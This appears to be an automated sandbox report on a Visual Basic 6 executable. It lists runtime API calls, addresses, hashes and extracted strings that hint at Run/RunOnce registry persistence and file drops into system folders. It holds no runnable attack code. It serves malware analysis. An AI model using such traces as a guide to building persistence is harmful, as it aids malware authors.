                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,00000000), ref: 0040C88D
                                                                                    • #598.MSVBVM60(0042C0D4), ref: 0040C8AE
                                                                                    • #580.MSVBVM60(00000000,00000027), ref: 0040C908
                                                                                    • __vbaStrCopy.MSVBVM60(00000000), ref: 0040C91D
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040C931
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C93F
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040C953
                                                                                    • __vbaStrMove.MSVBVM60(00407CC4), ref: 0040C987
                                                                                    • __vbaStrMove.MSVBVM60(00000000), ref: 0040C997
                                                                                    • #690.MSVBVM60(00000000,00000000), ref: 0040C9A4
                                                                                    • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,00000000,00000000), ref: 0040C9C4
                                                                                    • #600.MSVBVM60(00004008,00000000), ref: 0040C9F1
                                                                                    • __vbaEnd.MSVBVM60 ref: 0040CA04
                                                                                      • Part of subcall function 00429E10: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CBB8,80000002,00000000,00000000), ref: 00429E2E
                                                                                      • Part of subcall function 00429E10: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429E5B
                                                                                      • Part of subcall function 00429E10: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429E67
                                                                                      • Part of subcall function 00429E10: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00429E76
                                                                                      • Part of subcall function 00429E10: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429E8F
                                                                                      • Part of subcall function 00429E10: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 00429E9F
                                                                                      • Part of subcall function 00429E10: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429EAD
                                                                                      • Part of subcall function 00429E10: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429EB6
                                                                                      • Part of subcall function 00429E10: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429ECB
                                                                                      • Part of subcall function 00429E10: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429EDB
                                                                                      • Part of subcall function 00429E10: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429EE9
                                                                                      • Part of subcall function 00429E10: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429EF2
                                                                                      • Part of subcall function 00429E10: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429F08
                                                                                      • Part of subcall function 00429E10: __vbaFreeStr.MSVBVM60(00429F32,?,?,?,00000000,004032B6), ref: 00429F22
                                                                                      • Part of subcall function 00429E10: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429F2B
                                                                                    • #580.MSVBVM60(00000000,00000027), ref: 0040CA1A
                                                                                    • __vbaStrCat.MSVBVM60( RO,00000000), ref: 0040CA32
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CA3D
                                                                                    • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040CA57
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CA62
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000), ref: 0040CA7D
                                                                                    • __vbaStrCat.MSVBVM60( RO,00000000), ref: 0040CA99
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CAA4
                                                                                    • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040CABD
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CAC8
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000), ref: 0040CAE3
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040BED1
                                                                                      • Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                      • Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                      • Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                      • Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(66107559,00000000,00000000), ref: 00425A0A
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
                                                                                      • Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
                                                                                      • Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
                                                                                      • Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
                                                                                      • Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
                                                                                      • Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
                                                                                      • Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
                                                                                      • Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
                                                                                      • Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3
                                                                                    • __vbaStrCmp.MSVBVM60(00000000,00000000), ref: 0040C157
                                                                                    • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0E4,00000000), ref: 0040C1B9
                                                                                    • __vbaStrCat.MSVBVM60( PR,00000000,00000000), ref: 0040C1D2
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0040C1E8
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0040C1F7
                                                                                    • __vbaNew.MSVBVM60(004075DC), ref: 0040C209
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C214
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000730), ref: 0040C250
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040C26B
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C296
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040C2AA
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C2B7
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C2C7
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C2DF
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 00422A8B
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?,00000000), ref: 00422AA0
                                                                                      • Part of subcall function 004228E0: __vbaStrCmp.MSVBVM60(00000000), ref: 00422AA7
                                                                                      • Part of subcall function 004228E0: __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00422ACE
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422AF4
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000004), ref: 00422B15
                                                                                      • Part of subcall function 004228E0: #618.MSVBVM60(00000000), ref: 00422B1C
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 00422B27
                                                                                      • Part of subcall function 004228E0: __vbaI4Str.MSVBVM60(00000000), ref: 00422B2E
                                                                                      • Part of subcall function 004228E0: __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00422B45
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422B78
                                                                                      • Part of subcall function 004228E0: __vbaFileClose.MSVBVM60(00000000), ref: 00422B7F
                                                                                      • Part of subcall function 004228E0: __vbaFreeStr.MSVBVM60(00422BC8), ref: 00422BB8
                                                                                      • Part of subcall function 004228E0: __vbaFreeStr.MSVBVM60 ref: 00422BC1
                                                                                    • __vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000), ref: 0040B52E
                                                                                      • Part of subcall function 004296C0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
                                                                                      • Part of subcall function 004296C0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0
                                                                                      • Part of subcall function 004296C0: __vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B4C8
                                                                                      • Part of subcall function 0042A090: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
                                                                                      • Part of subcall function 0042A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
                                                                                      • Part of subcall function 0042A090: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
                                                                                      • Part of subcall function 0042A090: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7
                                                                                    • __vbaStrCmp.MSVBVM60(00406F28,?), ref: 0040B56A
                                                                                    • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0D4,00000000), ref: 0040B5CC
                                                                                    • __vbaStrCat.MSVBVM60( RU,00000000,00000000), ref: 0040B5E5
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B5F0
                                                                                    • __vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000), ref: 0040B611
                                                                                    • __vbaStrCat.MSVBVM60( RU,00000000), ref: 0040B62A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B635
                                                                                    • __vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000), ref: 0040B656
                                                                                    • #600.MSVBVM60(00004008,00000000,0042C0D4), ref: 0040B691
                                                                                    • __vbaEnd.MSVBVM60 ref: 0040B6A4
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BA01
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040BA15
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BA22
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BA32
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BA4A
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040B413
                                                                                      • Part of subcall function 004228E0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
                                                                                      • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
                                                                                      • Part of subcall function 004228E0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
                                                                                      • Part of subcall function 004228E0: #648.MSVBVM60(0000000A), ref: 00422959
                                                                                      • Part of subcall function 004228E0: __vbaFreeVar.MSVBVM60 ref: 00422968
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60(?), ref: 0042297C
                                                                                      • Part of subcall function 004228E0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 0042299A
                                                                                      • Part of subcall function 004228E0: #570.MSVBVM60(00000000), ref: 004229A1
                                                                                      • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
                                                                                      • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
                                                                                      • Part of subcall function 004228E0: #525.MSVBVM60(00000000), ref: 004229EC
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 004229F7
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A07
                                                                                      • Part of subcall function 004228E0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A22
                                                                                      • Part of subcall function 004228E0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422A4A
                                                                                      • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60 ref: 00422A68
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000003), ref: 00422A79
                                                                                      • Part of subcall function 004228E0: #616.MSVBVM60(00000000), ref: 00422A80
                                                                                    • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0F4,00000000,0042C0D4), ref: 0040CB52
                                                                                    • __vbaStrCat.MSVBVM60( MR,00000000,0042C110,0042C114,0042C118,00000000,0042C0D4), ref: 0040CB7A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CB85
                                                                                    • __vbaFreeStr.MSVBVM60(00000000), ref: 0040CB94
                                                                                    • __vbaStrCopy.MSVBVM60(80000002,00000000,00000000,80000002,00000000,00000000), ref: 0040CBE5
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B2E7
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B1D7
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                      • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                      • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0E4
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CBF9
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC06
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CC16
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC2E
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CC42
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC4F
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CC5F
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC77
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CC8B
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC98
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CCA8
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CCC0
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CCD4
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CCE1
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CCF1
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CD09
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040CD1B
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CD26
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040CD3B
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040CD42
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CD4D
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CD5A
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040CD72
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CD8A
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040CD9C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CDA7
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040CDBC
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040CDC3
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CDCE
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CDDB
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040CDF3
                                                                                    • __vbaStrCat.MSVBVM60(at.,00000000), ref: 0040CE0F
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CE1A
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040CE28
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CE33
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CE40
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CE50
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CE68
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CE7C
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CE89
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CE99
                                                                                      • Part of subcall function 00411F00: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CEB3,0042C160), ref: 00411F1E
                                                                                      • Part of subcall function 00411F00: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00411F4E
                                                                                      • Part of subcall function 00411F00: __vbaStrMove.MSVBVM60(0040CEB3,?,?,?,00000000,004032B6), ref: 00411F69
                                                                                      • Part of subcall function 00411F00: __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00411F7D
                                                                                      • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00411F86
                                                                                      • Part of subcall function 00411F00: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00411F97
                                                                                      • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?,004156AF), ref: 0041565A
                                                                                      • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415667
                                                                                      • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415674
                                                                                      • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415681
                                                                                      • Part of subcall function 00411F00: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041568D
                                                                                      • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 00415696
                                                                                      • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 0041569F
                                                                                      • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 004156A8
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CEE1
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407978,0000005C), ref: 0040CF27
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040CF42
                                                                                    • __vbaFreeStr.MSVBVM60(0040CFB1), ref: 0040CFA1
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040CFAA
                                                                                      • Part of subcall function 004115D0: __vbaErase.MSVBVM60(004065BC,0042C078,0000000A,-00000061,660E0EBE), ref: 00411B74
                                                                                      • Part of subcall function 004115D0: __vbaRedim.MSVBVM60(00000000,00000024,0042C078,004065BC,00000001,00000003,00000001), ref: 00411B97
                                                                                      • Part of subcall function 004115D0: __vbaAryLock.MSVBVM60(?,00000000), ref: 00411BAA
                                                                                      • Part of subcall function 004115D0: __vbaGenerateBoundsError.MSVBVM60 ref: 00411BCE
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 00411BFE
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?), ref: 00411C14
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 00411C1A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00411C2C
                                                                                      • Part of subcall function 004115D0: __vbaAryUnlock.MSVBVM60(?), ref: 00411C3E
                                                                                      • Part of subcall function 004115D0: __vbaAryLock.MSVBVM60(?,00000000), ref: 00411C4F
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 0040CFD8
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040CFFE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0040D02E
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000728), ref: 0040D081
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004077C4,0000001C), ref: 0040D0C9
                                                                                    • __vbaI2I4.MSVBVM60 ref: 0040D0ED
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040D0FA
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D164
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$Copy$List$Error$CheckHresult$Bstr$ChkstkSystem$AnsiNew2Unicode$#580$#525#600File$#517#537#616Unlock$#631$#516#570#648Open$#618#690Get3LockNameSeek$#529#535#598#611#661#669#705#709BoundsCloseComputerDestructEraseFromGenerateGet4OverflowPathRedimUser
                                                                                    • String ID: MR$ PR$ RO$ RU$ SE$:%7$Once$at $at.$system32\drivers\$system\$yLZ$~
                                                                                    • API String ID: 3992495243-2767012170
                                                                                    • Opcode ID: c75b1a3e694dbd6f5d10d2331ab2ca9d09b35fafcf85166375154907e56220f4
                                                                                    • Instruction ID: c9e735e97b199634a30fa5df19e6cf838b9fc4480779932f55755727901e6869
                                                                                    • Opcode Fuzzy Hash: c75b1a3e694dbd6f5d10d2331ab2ca9d09b35fafcf85166375154907e56220f4
                                                                                    • Instruction Fuzzy Hash: D2531A75A00208EFDB14DFA0EE89BDEBBB5EF48304F108169E506B72A0DB745A45CF59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    [Control-flow graph image, starting at block 4218d0-4219be; legend: Executed / Not Executed]
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,0040C78D,00000000,00000000), ref: 004218EE
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042191B
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00421927
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00421933
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00421942
